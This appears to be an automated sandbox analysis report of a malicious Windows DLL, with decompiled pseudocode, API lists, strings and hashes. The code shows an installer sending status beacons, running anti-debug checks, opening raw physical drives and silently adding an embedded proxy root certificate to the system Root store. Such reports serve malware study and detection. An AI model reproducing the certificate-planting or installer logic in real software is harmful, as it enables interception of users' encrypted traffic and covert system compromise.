                                                                                                                                                      				_t46 = E10001A50( &_v312, E100011E0( &_v44));
                                                                                                                                                      				_t108 = _t104 - 0x264 + 0x18;
                                                                                                                                                      				_t126 = _t46;
                                                                                                                                                      				if(_t46 == 0) {
                                                                                                                                                      					_t47 = E1001A0F0("Global\\exist_sign__install_r3"); // executed
                                                                                                                                                      					_t109 = _t108 + 4;
                                                                                                                                                      					__eflags = _t47;
                                                                                                                                                      					if(_t47 == 0) {
                                                                                                                                                      						_v576 = 0;
                                                                                                                                                      						E1000CF20(_t100,  &_v575, 0, 0x103);
                                                                                                                                                      						GetTempPathA(0x104,  &_v576);
                                                                                                                                                      						E1000CD96( &_v576,  &_v576, 0x104, E100011E0( &_v44));
                                                                                                                                                      						_t111 = _t109 + 0x18;
                                                                                                                                                      						CopyFileA( &_v312,  &_v576, 0); // executed
                                                                                                                                                      						_v580 = GetTickCount();
                                                                                                                                                      						while(1) {
                                                                                                                                                      							_t56 = E1001A170( &_v312); // executed
                                                                                                                                                      							_t102 = _t56;
                                                                                                                                                      							_t57 = E1001A170( &_v576); // executed
                                                                                                                                                      							_t111 = _t111 + 8;
                                                                                                                                                      							__eflags = _t56 - _t57;
                                                                                                                                                      							if(__eflags == 0) {
                                                                                                                                                      								break;
                                                                                                                                                      							}
                                                                                                                                                      							Sleep(0x3e8);
                                                                                                                                                      							__eflags = GetTickCount() - _v580 - 0x7530;
                                                                                                                                                      							if(__eflags <= 0) {
                                                                                                                                                      								continue;
                                                                                                                                                      							} else {
                                                                                                                                                      							}
                                                                                                                                                      							break;
                                                                                                                                                      						}
                                                                                                                                                      						E1001FDB0(); // executed
                                                                                                                                                      						E1001FF90(_t82, _t100, _t102, __eflags, "install", "user01", "-0.25", "45.0.0", "exe"); // executed
                                                                                                                                                      						_t114 = _t111 + 0x14 - 0x1c;
                                                                                                                                                      						_t89 = _t114;
                                                                                                                                                      						_v588 = _t114;
                                                                                                                                                      						_v612 = E10001160(_t114, __eflags, "status=main_start");
                                                                                                                                                      						E10020180(_t82, _t100, _t102, __eflags); // executed
                                                                                                                                                      						_t115 = _t114 + 0x1c;
                                                                                                                                                      						_t62 = PathFileExistsA("C:\\hijack"); // executed
                                                                                                                                                      						__eflags = _t62;
                                                                                                                                                      						if(__eflags != 0) {
                                                                                                                                                      							L15:
                                                                                                                                                      							_t116 = _t115 - 0x1c;
                                                                                                                                                      							_v592 = _t116;
                                                                                                                                                      							_v616 = E10001160(_t116, __eflags, "status=check_debug");
                                                                                                                                                      							E10020180(_t82, _t100, _t102, __eflags); // executed
                                                                                                                                                      							_t118 = _t116 + 0x1c - 0x1c;
                                                                                                                                                      							_v596 = _t118;
                                                                                                                                                      							_v620 = E10001160(_t118, __eflags, "user01");
                                                                                                                                                      							E1001FEA0(_t82, _t100, _t102, __eflags); // executed
                                                                                                                                                      							_t120 = _t118 + 0x1c - 0x1c;
                                                                                                                                                      							_v600 = _t120;
                                                                                                                                                      							_v624 = E10001160(_t120, __eflags, "user01");
                                                                                                                                                      							E1001FDC0(_t82, _t100, _t102, __eflags); // executed
                                                                                                                                                      							_v604 = _t120 + 0x1c - 0x1c;
                                                                                                                                                      							_v628 = E10001160(_t120 + 0x1c - 0x1c, __eflags, "status=main_over");
                                                                                                                                                      							E10020180(_t82, _t100, _t102, __eflags); // executed
                                                                                                                                                      						} else {
                                                                                                                                                      							E1001A0A0(); // executed
                                                                                                                                                      							_t75 = E1001A0B0(_t89); // executed
                                                                                                                                                      							__eflags = _t75;
                                                                                                                                                      							if(_t75 == 0) {
                                                                                                                                                      								L12:
                                                                                                                                                      							} else {
                                                                                                                                                      								__eflags = E10019D10();
                                                                                                                                                      								if(__eflags == 0) {
                                                                                                                                                      									_t77 = E1001FA30(_t82, _t100, _t102, __eflags, 0x3e8, 0); // executed
                                                                                                                                                      									_t115 = _t115 + 8;
                                                                                                                                                      									__eflags = _t77;
                                                                                                                                                      									if(__eflags != 0) {
                                                                                                                                                      										goto L15;
                                                                                                                                                      									} else {
                                                                                                                                                      									}
                                                                                                                                                      								} else {
                                                                                                                                                      									goto L12;
                                                                                                                                                      								}
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      					} else {
                                                                                                                                                      					}
                                                                                                                                                      					E1001A260(); // executed
                                                                                                                                                      					_v608 = 1;
                                                                                                                                                      					_v8 = 0xffffffff;
                                                                                                                                                      					E100011A0( &_v44);
                                                                                                                                                      					_t73 = _v608;
                                                                                                                                                      				} else {
                                                                                                                                                      					E10020A80(__ebx, _t100, _t101, _t126, "45.0.0");
                                                                                                                                                      					_v584 = 1;
                                                                                                                                                      					_v8 = 0xffffffff;
                                                                                                                                                      					E100011A0( &_v44);
                                                                                                                                                      					_t73 = _v584;
                                                                                                                                                      				}
                                                                                                                                                      				 *[fs:0x0] = _v16;
                                                                                                                                                      				return _t73;
                                                                                                                                                      			}

                                                                                                                                                      APIs
                                                                                                                                                      • _memset.LIBCMT ref: 100204F9
                                                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1002050F
                                                                                                                                                        • Part of subcall function 1001A600: _memset.LIBCMT ref: 1001A651
                                                                                                                                                        • Part of subcall function 1001A600: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1001A667
                                                                                                                                                        • Part of subcall function 1001A600: _sprintf.LIBCMT ref: 1001A6A5
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileModuleName_memset$_sprintf
                                                                                                                                                      • String ID: -0.25$45.0.0$45.0.0$C:\hijack$Global\exist_sign__install_r3$exe$install$status=check_debug$status=main_over$status=main_start$user01$user01$user01
                                                                                                                                                      • API String ID: 3079340674-1842766907
                                                                                                                                                      • Opcode ID: 4ceaccf67b994171112047eb2ea22666bcadc8f3eed4853a9765ecac428517e0
                                                                                                                                                      • Instruction ID: 7a4b6182ef5b3e753845166e3f5bee58e7f320f9ef64b03b030670d1f597adbb
                                                                                                                                                      • Opcode Fuzzy Hash: 4ceaccf67b994171112047eb2ea22666bcadc8f3eed4853a9765ecac428517e0
                                                                                                                                                      • Instruction Fuzzy Hash: 5351A1B5D04318ABEB20EBA4DC4BBDE7775DB50344F500194F90966182EB71BB84CFA2
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 52%
                                                                                                                                                      			E1001F720(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                      				int _v8;
                                                                                                                                                      				int _v12;
                                                                                                                                                      				char* _v16;
                                                                                                                                                      				BYTE* _v20;
                                                                                                                                                      				int _v24;
                                                                                                                                                      				int _v28;
                                                                                                                                                      				int _v32;
                                                                                                                                                      				int _v36;
                                                                                                                                                      				char _v299;
                                                                                                                                                      				char _v300;
                                                                                                                                                      				char _v563;
                                                                                                                                                      				char _v564;
                                                                                                                                                      				signed int _v568;
                                                                                                                                                      				void* __ebp;
                                                                                                                                                      				BYTE* _t66;
                                                                                                                                                      				int _t69;
                                                                                                                                                      				int _t70;
                                                                                                                                                      				int _t71;
                                                                                                                                                      				long _t72;
                                                                                                                                                      				int _t75;
                                                                                                                                                      				signed int _t90;
                                                                                                                                                      				void* _t120;
                                                                                                                                                      				void* _t121;
                                                                                                                                                      				void* _t122;
                                                                                                                                                      				void* _t123;
                                                                                                                                                      				void* _t124;
                                                                                                                                                      				void* _t127;
                                                                                                                                                      
                                                                                                                                                      				_t119 = __esi;
                                                                                                                                                      				_t118 = __edi;
                                                                                                                                                      				_t91 = __ebx;
                                                                                                                                                      				_v16 = "-----BEGIN CERTIFICATE-----\nMIIFTDCCBDSgAwIBAgIGAW3jTP9iMA0GCSqGSIb3DQEBCwUAMIGqMTswOQYDVQQD\nDDJDaGFybGVzIFByb3h5IENBICgxOSDljYHmnIggMjAxOSwgREVTS1RPUC1CTkFU\nMTFVKTElMCMGA1UECwwcaHR0cHM6Ly9jaGFybGVzcHJveHkuY29tL3NzbDERMA8G\nA1UECgwIWEs3MiBMdGQxETAPBgNVBAcMCEF1Y2tsYW5kMREwDwYDVQQIDAhBdWNr\nbGFuZDELMAkGA1UEBhMCTlowHhcNMDAwMTAxMDAwMDAwWhcNNDgxMjE1MDkxNTM3\nWjCBqjE7MDkGA1UEAwwyQ2hhcmxlcyBQcm94eSBDQSAoMTkg5Y2B5pyIIDIwMTks\nIERFU0tUT1AtQk5BVDExVSkxJTAjBgNVBAsMHGh0dHBzOi8vY2hhcmxlc3Byb3h5\nLmNvbS9zc2wxETAPBgNVBAoMCFhLNzIgTHRkMREwDwYDVQQHDAhBdWNrbGFuZDER\nMA8GA1UECAwIQXVja2xhbmQxCzAJBgNVBAYTAk5aMIIBIjANBgkqhkiG9w0BAQEF\nAAOCAQ8AMIIBCgKCAQEArobFBD7TTZn0T6MFLqNAR6f7vjMYix3CymRcoySeheVL\nSSHUmY/aaiIkfDLZCH10KvO/hQgDroweJfqtU/uP2CO3NT2aOsmSv5F/aTgmx5Dl\nOlQLEgtlU1COyVheRn0xC9Pvn7YXMd61Iut49D+CSzS+Nngtt6jLFizSIkexTkxa\n5jPtZlQjVKWZcb3cWRYOzcUhtEd8k8qeYk4K8AKYYCMA9dw2iBnDy58CYEY2iIJ2\ns6SYVwRztTKLCDTzJ8NCheMz2pIH4S8O27ZUyM8R48x8uhelLNfNQsEK4JWi5Oud\nPj82FIgkPwWEr0DnLW5uGCFJv7g0I4T2DxLhRzQljQIDAQABo4IBdDCCAXAwDwYD\nVR0TAQH/BAUwAwEB/zCCASwGCWCGSAGG+EIBDQSCAR0TggEZVGhpcyBSb290IGNl\ncnRpZmljYXRlIHdhcyBnZW5lcmF0ZWQgYnkgQ2hhcmxlcyBQcm94eSBmb3IgU1NM\nIFByb3h5aW5nLiBJZiB0aGlzIGNlcnRpZmljYXRlIGlzIHBhcnQgb2YgYSBjZXJ0\naWZpY2F0ZSBjaGFpbiwgdGhpcyBtZWFucyB0aGF0IHlvdSdyZSBicm93c2luZyB0\naHJvdWdoIENoYXJsZXMgUHJveHkgd2l0aCBTU0wgUHJveHlpbmcgZW5hYmxlZCBm\nb3IgdGhpcyB3ZWJzaXRlLiBQbGVhc2Ugc2VlIGh0dHA6Ly9jaGFybGVzcHJveHku\nY29tL3NzbCBmb3IgbW9yZSBpbmZvcm1hdGlvbi4wDgYDVR0PAQH/BAQDAgIEMB0G\nA1UdDgQWBBT40NxUNnz3lAIPi5J4Ol2KkSUfnzANBgkqhkiG9w0BAQsFAAOCAQEA\nZiJx651cdEyIOC3pi6NzIOYxIQTQQnOpIAeoZwl21lMOY0fQC73tExm7Z1TzYjdZ\nYJWSKRHjZhpwNU9roLeXp2JYvnreu4yNvu7Zd3YLgCcddLJETZL2wTN6N5tzVFsl\nHeX4gSuWJau7+u3BX4xsN0ubJt0P7wNRhfWJnYgZ5oncbbXwurv9Y3xSsb7IARW4\nifru1JPUES10SVStOr5mB8QaSi1le6Mw7RMfpOjCW7KO4YHc742pHBe/0wojyOro\nGxUu2F/5OK/DKzT/2v+9ty2bsEB
nv8h/V566ljexZeoAjqdAi8gmXzPAOb9g9QbS\nRaa1MBevyOFh1w7VsNdldg==\n-----END CERTIFICATE-----\n";
                                                                                                                                                      				_v24 = 0;
                                                                                                                                                      				_v8 = 0;
                                                                                                                                                      				_v28 = 0;
                                                                                                                                                      				_v12 = 0;
                                                                                                                                                      				if(CryptStringToBinaryA(_v16, 0, 0, 0,  &_v12, 0, 0) != 0 && _v12 > 0) {
                                                                                                                                                      					_t66 = L1000CE56(__ebx, _v12, __edi, __esi, _v12);
                                                                                                                                                      					_t122 = _t121 + 4;
                                                                                                                                                      					_v20 = _t66;
                                                                                                                                                      					_t133 = _v20;
                                                                                                                                                      					if(_v20 != 0) {
                                                                                                                                                      						CryptStringToBinaryA(_v16, 0, 0, _v20,  &_v12, 0, 0);
                                                                                                                                                      						_t69 = _v12;
                                                                                                                                                      						__imp__CertCreateCertificateContext(1, _v20, _t69); // executed
                                                                                                                                                      						_v8 = _t69;
                                                                                                                                                      						_push(_v20);
                                                                                                                                                      						_t70 = E1000CA30(__ebx, __edi, __esi, _t133);
                                                                                                                                                      						_t123 = _t122 + 4;
                                                                                                                                                      						if(_v8 != 0) {
                                                                                                                                                      							__imp__CertOpenStore(0xa, 0, 0, 0x24000, L"Root"); // executed
                                                                                                                                                      							_v28 = _t70;
                                                                                                                                                      							if(_v28 != 0) {
                                                                                                                                                      								_t71 = _v8;
                                                                                                                                                      								__imp__CertAddCertificateContextToStore(_v28, _t71, 1, 0); // executed
                                                                                                                                                      								if(_t71 == 0) {
                                                                                                                                                      									_t72 = GetLastError();
                                                                                                                                                      									__eflags = _t72 - 0x80092005;
                                                                                                                                                      									if(_t72 == 0x80092005) {
                                                                                                                                                      										_v36 = 0;
                                                                                                                                                      										_v32 = 0;
                                                                                                                                                      										__imp__CertGetCertificateContextProperty(_v8, 3, 0,  &_v36);
                                                                                                                                                      										__eflags = _v36;
                                                                                                                                                      										if(_v36 > 0) {
                                                                                                                                                      											_t75 = L1000CE56(__ebx,  &_v36, __edi, __esi, _v36 + 1);
                                                                                                                                                      											_t124 = _t123 + 4;
                                                                                                                                                      											_v32 = _t75;
                                                                                                                                                      											__eflags = _v32;
                                                                                                                                                      											if(_v32 != 0) {
                                                                                                                                                      												E1000CF20(_t118, _v32, 0, _v36 + 1);
                                                                                                                                                      												__imp__CertGetCertificateContextProperty(_v8, 3, _v32,  &_v36);
                                                                                                                                                      												_v564 = 0;
                                                                                                                                                      												E1000CF20(_t118,  &_v563, 0, 0x103);
                                                                                                                                                      												_v300 = 0;
                                                                                                                                                      												E1000CF20(_t118,  &_v299, 0, 0x103);
                                                                                                                                                      												_t127 = _t124 + 0x24;
                                                                                                                                                      												_v568 = 0;
                                                                                                                                                      												while(1) {
                                                                                                                                                      													__eflags = _v568 - _v36;
                                                                                                                                                      													if(_v568 >= _v36) {
                                                                                                                                                      														break;
                                                                                                                                                      													}
                                                                                                                                                      													E1000CC93(_t118, _t120 + _v568 * 2 - 0x128, "%02X",  *(_v32 + _v568) & 0x000000ff);
                                                                                                                                                      													_t127 = _t127 + 0xc;
                                                                                                                                                      													_t90 = _v568 + 1;
                                                                                                                                                      													__eflags = _t90;
                                                                                                                                                      													_v568 = _t90;
                                                                                                                                                      												}
                                                                                                                                                      												E1000CC93(_t118,  &_v564, "Software\\Microsoft\\SystemCertificates\\Root\\Certificates\\%s",  &_v300);
                                                                                                                                                      												_v24 = E1001F680(_a8, __eflags, 0x80000002,  &_v564, _a4, _a8);
                                                                                                                                                      												_push(_v32);
                                                                                                                                                      												E1000CA30(_t91, _t118, _t119, __eflags);
                                                                                                                                                      											}
                                                                                                                                                      										}
                                                                                                                                                      									}
                                                                                                                                                      								} else {
                                                                                                                                                      									_v24 = 1;
                                                                                                                                                      								}
                                                                                                                                                      								__imp__CertCloseStore(_v28, 1);
                                                                                                                                                      							}
                                                                                                                                                      							__imp__CertFreeCertificateContext(_v8);
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				return _v24;
                                                                                                                                                      			}






























                                                                                                                                                      0x1001f8b4
                                                                                                                                                      0x1001f8c9
                                                                                                                                                      0x1001f8ce
                                                                                                                                                      0x1001f8d1
                                                                                                                                                      0x1001f8ec
                                                                                                                                                      0x1001f8f2
                                                                                                                                                      0x1001f8f5
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001f91c
                                                                                                                                                      0x1001f921
                                                                                                                                                      0x1001f8e3
                                                                                                                                                      0x1001f8e3
                                                                                                                                                      0x1001f8e6
                                                                                                                                                      0x1001f8e6
                                                                                                                                                      0x1001f939
                                                                                                                                                      0x1001f95d
                                                                                                                                                      0x1001f963
                                                                                                                                                      0x1001f964
                                                                                                                                                      0x1001f969
                                                                                                                                                      0x1001f868
                                                                                                                                                      0x1001f84c
                                                                                                                                                      0x1001f80b
                                                                                                                                                      0x1001f80b
                                                                                                                                                      0x1001f80b
                                                                                                                                                      0x1001f972
                                                                                                                                                      0x1001f972
                                                                                                                                                      0x1001f97c
                                                                                                                                                      0x1001f97c
                                                                                                                                                      0x1001f7cc
                                                                                                                                                      0x1001f789
                                                                                                                                                      0x1001f988

                                                                                                                                                      APIs
                                                                                                                                                      • CryptStringToBinaryA.CRYPT32(10025F28,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1001F75E
                                                                                                                                                      • CryptStringToBinaryA.CRYPT32(10025F28,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1001F7A3
                                                                                                                                                      • CertCreateCertificateContext.CRYPT32(00000001,00000000,00000000), ref: 1001F7B3
                                                                                                                                                        • Part of subcall function 1000CA30: ___sbh_find_block.LIBCMT ref: 1000CA59
                                                                                                                                                        • Part of subcall function 1000CA30: ___sbh_free_block.LIBCMT ref: 1000CA68
                                                                                                                                                        • Part of subcall function 1000CA30: HeapFree.KERNEL32(00000000,?,103301C0,Function_0000CA30,1001322F,00000000), ref: 1000CA98
                                                                                                                                                        • Part of subcall function 1000CA30: GetLastError.KERNEL32(?,?,?,?,?,?,?,103301C0), ref: 1000CAA9
                                                                                                                                                      • CertOpenStore.CRYPT32(0000000A,00000000,00000000,00024000,Root), ref: 1001F7E2
                                                                                                                                                      • CertAddCertificateContextToStore.CRYPT32(00000000,00000000,00000001,00000000), ref: 1001F801
                                                                                                                                                      • GetLastError.KERNEL32 ref: 1001F817
                                                                                                                                                      • CertGetCertificateContextProperty.CRYPT32(00000000,00000003,00000000,00000000), ref: 1001F842
                                                                                                                                                      • _memset.LIBCMT ref: 1001F87B
                                                                                                                                                      • CertGetCertificateContextProperty.CRYPT32(00000000,00000003,00000000,00000000), ref: 1001F891
                                                                                                                                                      • _memset.LIBCMT ref: 1001F8AC
                                                                                                                                                      • _memset.LIBCMT ref: 1001F8C9
                                                                                                                                                      • _sprintf.LIBCMT ref: 1001F91C
                                                                                                                                                      • _sprintf.LIBCMT ref: 1001F939
                                                                                                                                                      • CertCloseStore.CRYPT32(00000000,00000001), ref: 1001F972
                                                                                                                                                      • CertFreeCertificateContext.CRYPT32(00000000), ref: 1001F97C
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Cert$CertificateContext$Store_memset$BinaryCryptErrorFreeLastPropertyString_sprintf$CloseCreateHeapOpen___sbh_find_block___sbh_free_block
                                                                                                                                                      • String ID: %02X$Root$Software\Microsoft\SystemCertificates\Root\Certificates\%s
                                                                                                                                                      • API String ID: 3311258246-1857994723
                                                                                                                                                      • Opcode ID: 0ce81e6e7efad015fc66a7c972b9d95a9014d6efbbcb29acca2529cb5b9abefb
                                                                                                                                                      • Instruction ID: afe3fe35dc8e16d3553f6fe7244bb1c21b11eefa07642306de8368dfec16bcca
                                                                                                                                                      • Opcode Fuzzy Hash: 0ce81e6e7efad015fc66a7c972b9d95a9014d6efbbcb29acca2529cb5b9abefb
                                                                                                                                                      • Instruction Fuzzy Hash: 986133B5D00219BBEB10DB90CC99FFEB778EB48704F104598F605BA280D775AA85CFA5
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 74%
                                                                                                                                                      			E1000E90E() {
                                                                                                                                                      				int _t13;
                                                                                                                                                      				long _t19;
                                                                                                                                                      				signed int _t20;
                                                                                                                                                      				signed int _t21;
                                                                                                                                                      				signed int _t22;
                                                                                                                                                      				signed int _t23;
                                                                                                                                                      				signed int _t27;
                                                                                                                                                      				signed int _t28;
                                                                                                                                                      				signed int _t32;
                                                                                                                                                      				signed int _t33;
                                                                                                                                                      				void* _t37;
                                                                                                                                                      				long _t39;
                                                                                                                                                      				void* _t40;
                                                                                                                                                      				signed int _t47;
                                                                                                                                                      				struct _OSVERSIONINFOA* _t49;
                                                                                                                                                      				void* _t51;
                                                                                                                                                      
                                                                                                                                                      				_t37 = GetProcessHeap;
                                                                                                                                                      				_t49 = HeapAlloc(GetProcessHeap(), 0, 0x94);
                                                                                                                                                      				if(_t49 != 0) {
                                                                                                                                                      					_t49->dwOSVersionInfoSize = 0x94;
                                                                                                                                                      					_t13 = GetVersionExA(_t49);
                                                                                                                                                      					__eflags = _t13;
                                                                                                                                                      					_push(_t49);
                                                                                                                                                      					_push(0);
                                                                                                                                                      					if(_t13 != 0) {
                                                                                                                                                      						 *(_t51 + 0xc) = _t49->dwPlatformId;
                                                                                                                                                      						 *(_t51 + 0x10) = _t49->dwMajorVersion;
                                                                                                                                                      						 *(_t51 - 4) = _t49->dwMinorVersion;
                                                                                                                                                      						_t47 = _t49->dwBuildNumber & 0x00007fff;
                                                                                                                                                      						HeapFree(GetProcessHeap(), ??, ??);
                                                                                                                                                      						_t19 =  *(_t51 + 0xc);
                                                                                                                                                      						__eflags = _t19 - 2;
                                                                                                                                                      						if(_t19 != 2) {
                                                                                                                                                      							_t47 = _t47 | 0x00008000;
                                                                                                                                                      							__eflags = _t47;
                                                                                                                                                      						}
                                                                                                                                                      						_t39 =  *(_t51 - 4);
                                                                                                                                                      						 *0x1033347c = _t19;
                                                                                                                                                      						_t20 =  *(_t51 + 0x10);
                                                                                                                                                      						_t44 = (_t20 << 8) + _t39;
                                                                                                                                                      						 *0x10333484 = (_t20 << 8) + _t39;
                                                                                                                                                      						 *0x10333488 = _t20;
                                                                                                                                                      						 *0x1033348c = _t39;
                                                                                                                                                      						 *0x10333480 = _t47;
                                                                                                                                                      						_t21 = E1000F7BF(1);
                                                                                                                                                      						__eflags = _t21;
                                                                                                                                                      						_pop(_t40);
                                                                                                                                                      						if(_t21 == 0) {
                                                                                                                                                      							goto L1;
                                                                                                                                                      						} else {
                                                                                                                                                      							_t23 = E100133E0(_t37);
                                                                                                                                                      							__eflags = _t23;
                                                                                                                                                      							if(_t23 != 0) {
                                                                                                                                                      								E10015081();
                                                                                                                                                      								 *0x10336f64 = GetCommandLineA();
                                                                                                                                                      								 *0x103332fc = E10014F4C(); // executed
                                                                                                                                                      								_t27 = E10014994(_t37, _t44, _t47, _t49, __eflags); // executed
                                                                                                                                                      								__eflags = _t27;
                                                                                                                                                      								if(_t27 >= 0) {
                                                                                                                                                      									_t28 = E10014E93(_t40);
                                                                                                                                                      									__eflags = _t28;
                                                                                                                                                      									if(_t28 < 0) {
                                                                                                                                                      										L15:
                                                                                                                                                      										E10014BD4();
                                                                                                                                                      										goto L10;
                                                                                                                                                      									} else {
                                                                                                                                                      										_t32 = E10014C20(_t40, _t44);
                                                                                                                                                      										__eflags = _t32;
                                                                                                                                                      										if(_t32 < 0) {
                                                                                                                                                      											goto L15;
                                                                                                                                                      										} else {
                                                                                                                                                      											_t33 = E1001167A(_t37, _t47, _t49, _t51, 0);
                                                                                                                                                      											__eflags = _t33;
                                                                                                                                                      											if(_t33 != 0) {
                                                                                                                                                      												goto L15;
                                                                                                                                                      											} else {
                                                                                                                                                      												 *0x103332f8 =  *0x103332f8 + 1;
                                                                                                                                                      												_t22 = 1;
                                                                                                                                                      												__eflags = 1;
                                                                                                                                                      											}
                                                                                                                                                      										}
                                                                                                                                                      									}
                                                                                                                                                      								} else {
                                                                                                                                                      									L10:
                                                                                                                                                      									E100130CA();
                                                                                                                                                      									goto L8;
                                                                                                                                                      								}
                                                                                                                                                      							} else {
                                                                                                                                                      								L8:
                                                                                                                                                      								E1000F819();
                                                                                                                                                      								goto L1;
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      					} else {
                                                                                                                                                      						HeapFree(GetProcessHeap(), ??, ??);
                                                                                                                                                      						goto L1;
                                                                                                                                                      					}
                                                                                                                                                      				} else {
                                                                                                                                                      					L1:
                                                                                                                                                      					_t22 = 0;
                                                                                                                                                      				}
                                                                                                                                                      				return _t22;
                                                                                                                                                      			}




















                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Heap$Process$Free$AllocCommandEnvironmentInitializeLineStringsVersion___crt__cinit__heap_term__ioinit__ioterm__mtterm__setargv__setenvp
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2870529951-0
                                                                                                                                                      • Opcode ID: 6c4bbaa7a2ed88e341af398c15252e428cac03d6031402dac072d6ceb804dc07
                                                                                                                                                      • Instruction ID: 130607f004240c79eb30421efa65504882722ed8364210b240487f0131cf44a3
                                                                                                                                                      • Opcode Fuzzy Hash: 6c4bbaa7a2ed88e341af398c15252e428cac03d6031402dac072d6ceb804dc07
                                                                                                                                                      • Instruction Fuzzy Hash: 05317F75A043919BF750EFB2888175A77E8EF48381F21C429E909DA356EB34EC418B61
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 85%
                                                                                                                                                      			E1001D7E0(void* __edi, intOrPtr _a4) {
                                                                                                                                                      				char _v8;
                                                                                                                                                      				void* _v12;
                                                                                                                                                      				void* _v16;
                                                                                                                                                      				void* _v20;
                                                                                                                                                      				void* _v24;
                                                                                                                                                      				void* _v28;
                                                                                                                                                      				void* _v32;
                                                                                                                                                      				void* _v36;
                                                                                                                                                      				void* _v40;
                                                                                                                                                      				signed short* _v44;
                                                                                                                                                      				void* _v48;
                                                                                                                                                      				intOrPtr _v52;
                                                                                                                                                      				intOrPtr _v56;
                                                                                                                                                      				signed int* _v60;
                                                                                                                                                      				char _v570;
                                                                                                                                                      				short _v572;
                                                                                                                                                      				char _v1596;
                                                                                                                                                      				void* _v1600;
                                                                                                                                                      				char _v1604;
                                                                                                                                                      				long _v1608;
                                                                                                                                                      				signed int _v1612;
                                                                                                                                                      				void* _v1616;
                                                                                                                                                      				void* _v1620;
                                                                                                                                                      				void* _v1624;
                                                                                                                                                      				void* _v1628;
                                                                                                                                                      				void* _v1632;
                                                                                                                                                      				signed int _v1633;
                                                                                                                                                      				void _v1636;
                                                                                                                                                      				char _v2148;
                                                                                                                                                      				char _v2164;
                                                                                                                                                      				void* _t73;
                                                                                                                                                      				int _t78;
                                                                                                                                                      				void* _t88;
                                                                                                                                                      				void* _t94;
                                                                                                                                                      				void* _t123;
                                                                                                                                                      				void* _t124;
                                                                                                                                                      
                                                                                                                                                      				_t123 = __edi;
                                                                                                                                                      				_v52 = _a4;
                                                                                                                                                      				if(_a4 == 0) {
                                                                                                                                                      					L18:
                                                                                                                                                      					return 0;
                                                                                                                                                      				}
                                                                                                                                                      				_v1600 = 0;
                                                                                                                                                      				_v1612 = 0;
                                                                                                                                                      				while(1 != 0) {
                                                                                                                                                      					_v572 = 0;
                                                                                                                                                      					E1000CF20(_t123,  &_v570, 0, 0x1fe);
                                                                                                                                                      					wsprintfW( &_v572, L"\\\\.\\PhysicalDrive%d", _v1612);
                                                                                                                                                      					_t124 = _t124 + 0x18;
                                                                                                                                                      					_t73 = CreateFileW( &_v572, 0xc0000000, 3, 0, 3, 0, 0); // executed
                                                                                                                                                      					_v48 = _t73;
                                                                                                                                                      					if(_v48 == 0xffffffff) {
                                                                                                                                                      						L15:
                                                                                                                                                      						_v1612 = 1 + _v1612;
                                                                                                                                                      						if(_v1612 < 4) {
                                                                                                                                                      							continue;
                                                                                                                                                      						}
                                                                                                                                                      						return _v1600;
                                                                                                                                                      					}
                                                                                                                                                      					_v1608 = 0;
                                                                                                                                                      					_v1636 = 0;
                                                                                                                                                      					_v1632 = 0;
                                                                                                                                                      					_v1628 = 0;
                                                                                                                                                      					_v1624 = 0;
                                                                                                                                                      					_v1620 = 0;
                                                                                                                                                      					_v1616 = 0;
                                                                                                                                                      					_t78 = DeviceIoControl(_v48, 0x74080, 0, 0,  &_v1636, 0x18,  &_v1608, 0); // executed
                                                                                                                                                      					if(_t78 == 0) {
                                                                                                                                                      						CloseHandle(_v48);
